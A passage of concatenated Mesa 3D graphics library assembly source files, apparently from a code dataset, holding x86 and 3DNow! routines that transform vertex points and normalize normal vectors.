MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPIR_2 ) )
PREFETCHW ( REGIND(EDX) )
ALIGNTEXT16
LLBL( G3TPIR_1 ):
PREFETCHW ( REGOFF(32, EDX) )
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM1 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
MOVQ ( MM0, REGOFF(-16, EDX) ) /* r1 | r0 */
MOVD ( MM1, REGOFF(-8, EDX) ) /* | r2 */
JNZ ( LLBL( G3TPIR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPIR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 13,763
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/x86_xform3.S
|
/* $Id: x86_xform3.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* NOTE: Avoid using spaces in between '(' ')' and arguments, especially
* with macros like CONST, LLBL that expand to CONCAT(...). Putting spaces
* in there will break the build on some platforms.
*/
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FP_ONE 1065353216
#define FP_ZERO 0
#define SRC0 REGOFF(0, ESI)
#define SRC1 REGOFF(4, ESI)
#define SRC2 REGOFF(8, ESI)
#define SRC3 REGOFF(12, ESI)
#define DST0 REGOFF(0, EDI)
#define DST1 REGOFF(4, EDI)
#define DST2 REGOFF(8, EDI)
#define DST3 REGOFF(12, EDI)
#define MAT0 REGOFF(0, EDX)
#define MAT1 REGOFF(4, EDX)
#define MAT2 REGOFF(8, EDX)
#define MAT3 REGOFF(12, EDX)
#define MAT4 REGOFF(16, EDX)
#define MAT5 REGOFF(20, EDX)
#define MAT6 REGOFF(24, EDX)
#define MAT7 REGOFF(28, EDX)
#define MAT8 REGOFF(32, EDX)
#define MAT9 REGOFF(36, EDX)
#define MAT10 REGOFF(40, EDX)
#define MAT11 REGOFF(44, EDX)
#define MAT12 REGOFF(48, EDX)
#define MAT13 REGOFF(52, EDX)
#define MAT14 REGOFF(56, EDX)
#define MAT15 REGOFF(60, EDX)
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points3_general )
HIDDEN(_mesa_x86_transform_points3_general)
GLNAME( _mesa_x86_transform_points3_general ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p3_gr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_gr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC0 ) /* F7 F6 F5 F4 */
FMUL_S( MAT3 )
FLD_S( SRC1 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT6 )
FLD_S( SRC1 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT7 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
FLD_S( SRC2 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT10 )
FLD_S( SRC2 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT11 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
FXCH( ST(3) ) /* F4 F6 F5 F7 */
FADD_S( MAT12 )
FXCH( ST(2) ) /* F5 F6 F4 F7 */
FADD_S( MAT13 )
FXCH( ST(1) ) /* F6 F5 F4 F7 */
FADD_S( MAT14 )
FXCH( ST(3) ) /* F7 F5 F4 F6 */
FADD_S( MAT15 )
FXCH( ST(2) ) /* F4 F5 F7 F6 */
FSTP_S( DST0 ) /* F5 F7 F6 */
FSTP_S( DST1 ) /* F7 F6 */
FXCH( ST(1) ) /* F6 F7 */
FSTP_S( DST2 ) /* F7 */
FSTP_S( DST3 ) /* */
LLBL(x86_p3_gr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_gr_loop) )
LLBL(x86_p3_gr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points3_perspective )
HIDDEN(_mesa_x86_transform_points3_perspective)
GLNAME( _mesa_x86_transform_points3_perspective ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p3_pr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_pr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC2 ) /* F0 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F2 F1 F0 F5 F4 */
FMUL_S( MAT10 )
FXCH( ST(2) ) /* F0 F1 F2 F5 F4 */
FADDP( ST0, ST(4) ) /* F1 F2 F5 F4 */
FADDP( ST0, ST(2) ) /* F2 F5 F4 */
FLD_S( MAT14 ) /* F6 F2 F5 F4 */
FXCH( ST(1) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
MOV_L( SRC2, EBX )
XOR_L( CONST(-2147483648), EBX )/* change sign */
FXCH( ST(2) ) /* F4 F5 F6 */
FSTP_S( DST0 ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
MOV_L( EBX, DST3 )
LLBL(x86_p3_pr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_pr_loop) )
LLBL(x86_p3_pr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points3_3d )
HIDDEN(_mesa_x86_transform_points3_3d)
GLNAME( _mesa_x86_transform_points3_3d ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p3_3dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_3dr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC1 ) /* F0 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT6 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
FLD_S( SRC2 ) /* F0 F6 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT10 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
FXCH( ST(2) ) /* F4 F5 F6 */
FADD_S( MAT12 )
FXCH( ST(1) ) /* F5 F4 F6 */
FADD_S( MAT13 )
FXCH( ST(2) ) /* F6 F4 F5 */
FADD_S( MAT14 )
FXCH( ST(1) ) /* F4 F6 F5 */
FSTP_S( DST0 ) /* F6 F5 */
FXCH( ST(1) ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
LLBL(x86_p3_3dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_3dr_loop) )
LLBL(x86_p3_3dr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points3_3d_no_rot )
HIDDEN(_mesa_x86_transform_points3_3d_no_rot)
GLNAME( _mesa_x86_transform_points3_3d_no_rot ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p3_3dnrr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_3dnrr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F1 F4 */
FMUL_S( MAT5 )
FLD_S( SRC2 ) /* F2 F1 F4 */
FMUL_S( MAT10 )
FXCH( ST(2) ) /* F4 F1 F2 */
FADD_S( MAT12 )
FLD_S( MAT13 ) /* F5 F4 F1 F2 */
FXCH( ST(2) ) /* F1 F4 F5 F2 */
FADDP( ST0, ST(2) ) /* F4 F5 F2 */
FLD_S( MAT14 ) /* F6 F4 F5 F2 */
FXCH( ST(3) ) /* F2 F4 F5 F6 */
FADDP( ST0, ST(3) ) /* F4 F5 F6 */
FSTP_S( DST0 ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
LLBL(x86_p3_3dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_3dnrr_loop) )
LLBL(x86_p3_3dnrr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points3_2d )
HIDDEN(_mesa_x86_transform_points3_2d)
GLNAME( _mesa_x86_transform_points3_2d ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p3_2dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_2dr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC1 ) /* F0 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F5 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F0 F1 F5 F4 */
FADDP( ST0, ST(3) ) /* F1 F5 F4 */
FADDP( ST0, ST(1) ) /* F5 F4 */
FXCH( ST(1) ) /* F4 F5 */
FADD_S( MAT12 )
FXCH( ST(1) ) /* F5 F4 */
FADD_S( MAT13 )
MOV_L( SRC2, EBX )
FXCH( ST(1) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
LLBL(x86_p3_2dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_2dr_loop) )
LLBL(x86_p3_2dr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points3_2d_no_rot )
HIDDEN(_mesa_x86_transform_points3_2d_no_rot)
GLNAME( _mesa_x86_transform_points3_2d_no_rot ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p3_2dnrr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_2dnrr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F1 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F4 F1 */
FADD_S( MAT12 )
FLD_S( MAT13 ) /* F5 F4 F1 */
FXCH( ST(2) ) /* F1 F4 F5 */
FADDP( ST0, ST(2) ) /* F4 F5 */
MOV_L( SRC2, EBX )
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
LLBL(x86_p3_2dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_2dnrr_loop) )
LLBL(x86_p3_2dnrr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points3_identity )
HIDDEN(_mesa_x86_transform_points3_identity)
GLNAME(_mesa_x86_transform_points3_identity ):
#define FRAME_OFFSET 16
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
PUSH_L( EBP )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p3_ir_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
CMP_L( ESI, EDI )
JE( LLBL(x86_p3_ir_done) )
ALIGNTEXT16
LLBL(x86_p3_ir_loop):
#if 1
MOV_L( SRC0, EBX )
MOV_L( SRC1, EBP )
MOV_L( SRC2, EDX )
MOV_L( EBX, DST0 )
MOV_L( EBP, DST1 )
MOV_L( EDX, DST2 )
#else
FLD_S( SRC0 )
FLD_S( SRC1 )
FLD_S( SRC2 )
FSTP_S( DST2 )
FSTP_S( DST1 )
FSTP_S( DST0 )
#endif
LLBL(x86_p3_ir_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_ir_loop) )
LLBL(x86_p3_ir_done):
POP_L( EBP )
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 30,485
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/3dnow_normal.S
|
/* $Id: 3dnow_normal.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 5.1
*
* Copyright (C) 1999-2003 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* 3Dnow assembly code by Holger Waechtler
*/
#ifdef USE_3DNOW_ASM
#include "matypes.h"
#include "norm_args.h"
SEG_TEXT
#define M(i) REGOFF(i * 4, ECX)
#define STRIDE REGOFF(12, ESI)
ALIGNTEXT16
GLOBL GLNAME(_mesa_3dnow_transform_normalize_normals)
HIDDEN(_mesa_3dnow_transform_normalize_normals)
GLNAME(_mesa_3dnow_transform_normalize_normals):
#define FRAME_OFFSET 12
PUSH_L ( EDI )
PUSH_L ( ESI )
PUSH_L ( EBP )
MOV_L ( ARG_LENGTHS, EDI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EBP ) /* dest->count = in->count */
MOV_L ( EBP, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
CMP_L ( CONST(0), EBP ) /* count > 0 ?? */
JE ( LLBL (G3TN_end) )
MOV_L ( REGOFF (V4F_COUNT, ESI), EBP )
FEMMS
PUSH_L ( EBP )
PUSH_L ( EAX )
PUSH_L ( EDX ) /* save counter & pointer for */
/* the normalize pass */
#undef FRAME_OFFSET
#define FRAME_OFFSET 24
MOVQ ( M(0), MM3 ) /* m1 | m0 */
MOVQ ( M(4), MM4 ) /* m5 | m4 */
MOVD ( M(2), MM5 ) /* | m2 */
PUNPCKLDQ ( M(6), MM5 ) /* m6 | m2 */
MOVQ ( M(8), MM6 ) /* m9 | m8 */
MOVQ ( M(10), MM7 ) /* | m10 */
CMP_L ( CONST(0), EDI ) /* lengths == 0 ? */
JNE ( LLBL (G3TN_scale_end ) )
MOVD ( ARG_SCALE, MM0 ) /* | scale */
PUNPCKLDQ ( MM0, MM0 ) /* scale | scale */
PFMUL ( MM0, MM3 ) /* scale * m1 | scale * m0 */
PFMUL ( MM0, MM4 ) /* scale * m5 | scale * m4 */
PFMUL ( MM0, MM5 ) /* scale * m6 | scale * m2 */
PFMUL ( MM0, MM6 ) /* scale * m9 | scale * m8 */
PFMUL ( MM0, MM7 ) /* | scale * m10 */
ALIGNTEXT32
LLBL (G3TN_scale_end):
LLBL (G3TN_transform):
MOVQ ( REGIND (EDX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF (8, EDX), MM2 ) /* | x2 */
MOVQ ( MM0, MM1 ) /* x1 | x0 */
PUNPCKLDQ ( MM2, MM2 ) /* x2 | x2 */
PFMUL ( MM3, MM0 ) /* x1*m1 | x0*m0 */
ADD_L ( CONST(16), EAX ) /* next r */
PREFETCHW ( REGIND(EAX) )
PFMUL ( MM4, MM1 ) /* x1*m5 | x0*m4 */
PFACC ( MM1, MM0 ) /* x0*m4+x1*m5 | x0*m0+x1*m1 */
PFMUL ( MM5, MM2 ) /* x2*m6 | x2*m2 */
PFADD ( MM2, MM0 ) /* x0*m4+x1*m5+x2*m6| x0*m0+...+x2**/
MOVQ ( REGIND (EDX), MM1 ) /* x1 | x0 */
MOVQ ( MM0, REGOFF(-16, EAX) ) /* write r0, r1 */
PFMUL ( MM6, MM1 ) /* x1*m9 | x0*m8 */
MOVD ( REGOFF (8, EDX), MM2 ) /* | x2 */
PFMUL ( MM7, MM2 ) /* | x2*m10 */
PFACC ( MM1, MM1 ) /* *not used* | x0*m8+x1*m9 */
PFADD ( MM2, MM1 ) /* *not used* | x0*m8+x1*m9+x2*m*/
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
MOVD ( MM1, REGOFF(-8, EAX) ) /* write r2 */
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
JNZ ( LLBL (G3TN_transform) )
POP_L ( EDX ) /* end of transform --- */
POP_L ( EAX ) /* now normalizing ... */
POP_L ( EBP )
CMP_L ( CONST(0), EDI ) /* lengths == 0 ? */
JE ( LLBL (G3TN_norm ) ) /* calculate lengths */
ALIGNTEXT32
LLBL (G3TN_norm_w_lengths):
PREFETCHW ( REGOFF(12,EAX) )
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM1 ) /* | x2 */
MOVD ( REGIND (EDI), MM3 ) /* | length (x) */
PFMUL ( MM3, MM1 ) /* | x2 (normalize*/
PUNPCKLDQ ( MM3, MM3 ) /* length (x) | length (x) */
PFMUL ( MM3, MM0 ) /* x1 (normalized) | x0 (normalize*/
ADD_L ( STRIDE, EDX ) /* next normal */
ADD_L ( CONST(4), EDI ) /* next length */
PREFETCH ( REGIND(EDI) )
MOVQ ( MM0, REGIND(EAX) ) /* write new x0, x1 */
MOVD ( MM1, REGOFF(8, EAX) ) /* write new x2 */
ADD_L ( CONST(16), EAX ) /* next r */
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
JNZ ( LLBL (G3TN_norm_w_lengths) )
JMP ( LLBL (G3TN_exit_3dnow) )
ALIGNTEXT32
LLBL (G3TN_norm):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND (EAX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM1 ) /* | x2 */
MOVQ ( MM0, MM3 ) /* x1 | x0 */
MOVQ ( MM1, MM4 ) /* | x2 */
PFMUL ( MM0, MM3 ) /* x1*x1 | x0*x0 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM1, MM4 ) /* | x2*x2 */
PFADD ( MM4, MM3 ) /* | x0*x0+x2*x2 */
PFACC ( MM3, MM3 ) /* **not used** | x0*x0+x1*x1+x2**/
PFRSQRT ( MM3, MM5 ) /* 1/sqrt (x0*x0+x1*x1+x2*x2) */
MOVQ ( MM5, MM4 )
PUNPCKLDQ ( MM3, MM3 )
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
PFMUL ( MM5, MM5 )
PFRSQIT1 ( MM3, MM5 )
PFRCPIT2 ( MM4, MM5 )
PFMUL ( MM5, MM0 ) /* x1 (normalized) | x0 (normalize*/
MOVQ ( MM0, REGOFF(-16, EAX) ) /* write new x0, x1 */
PFMUL ( MM5, MM1 ) /* | x2 (normalize*/
MOVD ( MM1, REGOFF(-8, EAX) ) /* write new x2 */
JNZ ( LLBL (G3TN_norm) )
LLBL (G3TN_exit_3dnow):
FEMMS
LLBL (G3TN_end):
POP_L ( EBP )
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
GLOBL GLNAME(_mesa_3dnow_transform_normalize_normals_no_rot)
HIDDEN(_mesa_3dnow_transform_normalize_normals_no_rot)
GLNAME(_mesa_3dnow_transform_normalize_normals_no_rot):
#undef FRAME_OFFSET
#define FRAME_OFFSET 12
PUSH_L ( EDI )
PUSH_L ( ESI )
PUSH_L ( EBP )
MOV_L ( ARG_LENGTHS, EDI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EBP ) /* dest->count = in->count */
MOV_L ( EBP, REGOFF(V4F_COUNT, EAX) )
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
